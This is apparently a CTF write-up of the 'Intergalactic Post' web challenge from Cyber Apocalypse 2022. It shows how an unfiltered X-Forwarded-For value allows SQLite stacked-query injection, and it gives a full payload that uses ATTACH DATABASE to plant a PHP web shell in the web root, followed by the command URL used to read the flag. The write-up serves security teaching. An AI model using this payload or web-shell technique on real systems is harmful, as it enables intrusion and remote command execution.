InfoSec Write-ups


Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up

Prompt:

Intergalactic Post
The biggest intergalactic newsletter agency has constantly been spreading misinformation about the energy crisis war. Bonnie’s sources confirmed a hostile takeover of the agency took place a few months back, and we suspect the Golden Fang army is behind this. Ulysses found us a potential access point to their agency servers. Can you hack their newsletter subscribe portal and get us entry?

Start:

This is a web challenge and we are given the source code of the application, so we download it and build it to test locally before going for the flag on the live instance.

First we check the website and its functionality.

It asks for an e-mail address to subscribe.

When we give input in e-mail format, it is accepted.

But when we give input in another format, such as test', it is rejected.

Let's check the source code to see what it does with our input and how it filters it.

It uses filter_var() with FILTER_VALIDATE_EMAIL, which only checks that the input has the shape of an e-mail address.

I also looked into whether this filter can be bypassed for SQL injection, because, as the screenshot of the insert query showed, our e-mail is written straight into the database.

I found the link below.

But that link only covers SQL injection login bypasses using strings that are still in e-mail format. So, to be sure the query itself was injectable, I removed the filter_var() call from my local copy and ran sqlmap against it.

And yes, with the filter gone sqlmap enumerates the tables, so the query is injectable and filter_var() is the only thing protecting the e-mail parameter.

The other thing I noticed is that the application also takes our IP address and writes it to the database, and that value goes through no filter at all.

Since the IP address is read from a request header, we can set the X-Forwarded-For header ourselves and the application will use whatever we send.

The payload below is adapted from this SQLite injection cheat sheet:

http://atta.cked.me/home/sqlite3injectioncheatsheet

We use this header:

X-Forwarded-For: blahblah','blahblah');ATTACH DATABASE '/www/lol.php' as lol;CREATE TABLE lol.pwn(dataz text); INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--

The e-mail still passes the filter, but the IP address is never checked for a valid format, so the injected value closes the string and the VALUES list of the original INSERT, and the stacked statements run (this relies on the database driver executing several statements in one call). ATTACH DATABASE creates a new SQLite file at /www/lol.php, which is served as the web root, and the INSERT stores the PHP tag as a row, so the file contains <?php system($_GET['cmd']); ?> verbatim. PHP ignores the surrounding SQLite bytes and executes only what is inside the PHP tags when the file is requested.

Then we have a web shell at /lol.php and can read the flag with:

http://206.189.126.144:31604/lol.php?cmd=cat%20/flag*


Written by zer0dac

Diary of a man who wants to hack his limits
